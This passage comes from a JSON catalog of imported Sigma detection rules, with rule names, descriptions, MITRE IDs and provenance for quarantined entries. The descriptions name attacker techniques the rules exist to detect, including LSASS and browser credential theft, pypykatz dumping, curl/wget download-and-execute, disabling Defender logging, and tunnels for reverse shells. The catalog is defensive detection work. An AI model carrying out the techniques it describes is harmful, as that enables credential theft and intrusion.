"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml" } }, { "id": "sigmahq-sigma-a18dd26b-6450-46de-8c91-9659150cf088", "type": "detection", "name": "Potentially Suspicious GrantedAccess Flags On LSASS", "description": "Detects process access requests to LSASS process with potentially suspicious access flags", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potentially-suspicious-grantedaccess-flags-on-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a18dd26b-6450-46de-8c91-9659150cf088", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_susp_access_flag.yml" } }, { "id": "sigmahq-sigma-a18e0862-127b-43ca-be12-1a542c75c7c5", "type": "detection", "name": "LSASS Process Crashed - Application", "description": "Detects Windows error reporting events where the process that crashed is LSASS (Local Security Authority Subsystem Service).\nThis could be the cause of a provoked crash by techniques such as Lsass-Shtinkering to dump credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-process-crashed-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a18e0862-127b-43ca-be12-1a542c75c7c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/application_error/win_application_error_lsass_crash.yml" } }, { "id": "sigmahq-sigma-a197e378-d31b-41c0-9635-cfdf1c1bb423", "type": "detection", "name": "HackTool - WinRM Access Via Evil-WinRM", "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol 
(RDP). The adversary may then perform actions as the logged-on user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-winrm-access-via-evil-winrm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml" } }, { "id": "sigmahq-sigma-a1a144b7-5c9b-4853-a559-2172be8d4a03", "type": "detection", "name": "Remote Thread Creation In Uncommon Target Image", "description": "Detects uncommon target processes for remote thread creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-creation-in-uncommon-target-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml" } }, { "id": 
"sigmahq-sigma-a1b0ca4e-7835-413e-8471-3ff2b8a66be6", "type": "detection", "name": "Potential Remote Command Execution In Pod Container", "description": "Detects attempts to execute remote commands, within a Pod's container using e.g. the \"kubectl exec\" command.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1609" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remote-command-execution-in-pod-container.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1b0ca4e-7835-413e-8471-3ff2b8a66be6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_exec_into_container.yml" } }, { "id": "sigmahq-sigma-a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "type": "detection", "name": "Potential Persistence Via DLLPathOverride", "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-dllpathoverride.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml" } }, { "id": "sigmahq-sigma-a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6", "type": "detection", "name": "Disabling Windows Defender WMI Autologger Session via Reg.exe", "description": "Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events.\nBy setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events\nfrom being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabling-windows-defender-wmi-autologger-session-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_disable_defender_wmi_autologger.yml" } }, { "id": "sigmahq-sigma-a1d9eec5-33b2-4177-8d24-27fe754d0812", "type": "detection", "name": "Cloudflared Tunnels Related DNS Requests", "description": "Detects DNS requests to Cloudflared tunnels domains.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cloudflared-tunnels-related-dns-requests.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1d9eec5-33b2-4177-8d24-27fe754d0812", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_cloudflared_communication.yml" } }, { "id": "sigmahq-sigma-a1dfd976-4852-41d4-9507-dc6590a3ccd0", "type": "detection", "name": "Suspicious File Access to Browser Credential Storage", "description": "Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.\nAdversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.\nThis behavior is commonly observed in credential-stealing malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1555.003", "T1217" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-access-to-browser-credential-storage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1dfd976-4852-41d4-9507-dc6590a3ccd0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_process_access_browser_cred_files.yml" } }, { "id": "sigmahq-sigma-a1e11042-a74a-46e6-b07c-c4ce8ecc239b", "type": "detection", "name": "Potential Persistence Via Event Viewer Events.asp", "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-event-viewer-events-asp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml" } }, { "id": "sigmahq-sigma-a20391f8-76fb-437b-abc0-dba2df1952c6", "type": "detection", "name": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution", "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-nodejstools-pressanykey-arbitrary-binary-execution.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a20391f8-76fb-437b-abc0-dba2df1952c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml" } }, { "id": "sigmahq-sigma-a20def93-0709-4eae-9bd2-31206e21e6b2", "type": "detection", "name": "DriverQuery.EXE Execution", "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/driverquery-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a20def93-0709-4eae-9bd2-31206e21e6b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_driverquery_usage.yml" } }, { "id": "sigmahq-sigma-a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "type": "detection", "name": "DNS Server Discovery Via LDAP Query", "description": "Detects DNS server discovery via LDAP query requests from uncommon applications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/dns-server-discovery-via-ldap-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml" } }, { "id": "sigmahq-sigma-a23791fe-8846-485a-b16b-ca691e1b03d4", "type": "detection", "name": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-rundll-launcher-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a23791fe-8846-485a-b16b-ca691e1b03d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" } }, { "id": "sigmahq-sigma-a238b5d0-ce2d-4414-a676-7a531b3d13d6", "type": "detection", "name": "ETW Trace Evasion Activity", "description": "Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1070", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-trace-evasion-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml" } }, { "id": "sigmahq-sigma-a24e5861-c6ca-4fde-a93c-ba9256feddf0", "type": "detection", "name": "Uncommon Process Access Rights For Target Image", "description": "Detects process access request to uncommon target images with a \"PROCESS_ALL_ACCESS\" access mask.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1055.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-process-access-rights-for-target-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a24e5861-c6ca-4fde-a93c-ba9256feddf0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_susp_all_access_uncommon_target.yml" } }, { "id": "sigmahq-sigma-a27e5fa9-c35e-4e3d-b7e0-1ce2af66ad12", "type": "detection", "name": "CSExec Service Installation", "description": "Detects CSExec service installation and execution events", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/csexec-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a27e5fa9-c35e-4e3d-b7e0-1ce2af66ad12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml" } }, { "id": "sigmahq-sigma-a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "type": "detection", "name": "RDP Sensitive Settings Changed to Zero", "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-sensitive-settings-changed-to-zero.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" } }, { "id": 
"sigmahq-sigma-a2910908-e86f-4687-aeba-76a5f996e652", "type": "detection", "name": "DLL Execution Via Register-cimprovider.exe", "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-execution-via-register-cimprovider-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2910908-e86f-4687-aeba-76a5f996e652", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml" } }, { "id": "sigmahq-sigma-a29808fd-ef50-49ff-9c7a-59a9b040b404", "type": "detection", "name": "HackTool - Pypykatz Credentials Dumping Activity", "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. 
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-pypykatz-credentials-dumping-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_pypykatz.yml" } }, { "id": "sigmahq-sigma-a29c1813-ab1f-4dde-b489-330b952e91ae", "type": "detection", "name": "Suspicious Network Command", "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-network-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a29c1813-ab1f-4dde-b489-330b952e91ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_susp_network_command.yml" } }, { "id": "sigmahq-sigma-a2cb56ff-4f46-437a-a0fa-ffa4d1303cba", "type": "detection", "name": "Azure AD Threat Intelligence", "description": "Indicates user activity that is unusual for the user or consistent with known attack patterns.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-ad-threat-intelligence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2cb56ff-4f46-437a-a0fa-ffa4d1303cba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml" } }, { "id": "sigmahq-sigma-a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa", "type": "detection", "name": "Suspicious Download and Execute Pattern via Curl/Wget", "description": "Detects suspicious use of command-line tools such as curl or wget to download remote\ncontent - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by\nimmediate execution, indicating potential malicious activity. 
This pattern is commonly used\nby malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-download-and-execute-pattern-via-curl-wget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_curl_wget_exec_tmp.yml" } }, { "id": "sigmahq-sigma-a2e5019d-a658-4c6a-92bf-7197b54e2cae", "type": "detection", "name": "PowerShell Scripts Installed as Services", "description": "Detects powershell script installed as a Service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-scripts-installed-as-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/system/service_control_manager/win_system_powershell_script_installed_as_service.yml" } }, { "id": "sigmahq-sigma-a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "type": "detection", "name": "Suspicious Driver Install by pnputil.exe", "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-driver-install-by-pnputil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" } }, { "id": "sigmahq-sigma-a2edbce1-95c8-4291-8676-0d45146862b3", "type": "detection", "name": "Potential SolidPDFCreator.DLL Sideloading", "description": "Detects potential DLL sideloading of \"SolidPDFCreator.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-solidpdfcreator-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a2edbce1-95c8-4291-8676-0d45146862b3", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_solidpdfcreator.yml" } }, { "id": "sigmahq-sigma-a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "type": "detection", "name": "Raccine Uninstall", "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/raccine-uninstall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" } }, { "id": "sigmahq-sigma-a34f79a3-8e5f-4cc3-b765-de00695452c2", "type": "detection", "name": "HackTool - PowerTool Execution", "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-powertool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 
AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_powertool.yml" } }, { "id": "sigmahq-sigma-a3501e8e-af9e-43c6-8cd6-9360bdaae498", "type": "detection", "name": "Activity from Suspicious IP Addresses", "description": "Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as botnet C&C, and may indicate a compromised account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activity-from-suspicious-ip-addresses.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml" } }, { "id": "sigmahq-sigma-a35f5a72-f347-4e36-8895-9869b0d5fc6d", "type": "detection", "name": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
